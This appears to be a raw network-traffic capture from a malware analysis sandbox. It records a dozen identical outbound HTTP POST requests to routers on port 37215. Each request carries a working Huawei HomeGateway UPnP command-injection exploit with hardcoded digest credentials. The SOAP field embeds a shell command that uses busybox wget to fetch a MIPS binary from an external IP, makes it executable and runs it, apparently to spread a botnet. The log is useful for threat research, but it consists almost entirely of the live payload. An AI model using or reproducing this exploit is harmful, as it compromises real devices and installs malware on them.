                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          982192.168.2.2345674142.27.92.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269736052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          983192.168.2.234553441.137.84.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269752026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          984192.168.2.2342440197.68.194.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269758940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          985192.168.2.233572441.230.181.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269771099 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          986192.168.2.236048441.174.178.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269778967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          987192.168.2.2355078157.207.232.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269798994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          988192.168.2.2349978197.33.96.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269800901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          989192.168.2.2345998197.217.87.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269817114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          990192.168.2.233367641.27.34.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269833088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          991192.168.2.2349784167.164.88.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269834995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          992192.168.2.2356828136.15.182.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.269853115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
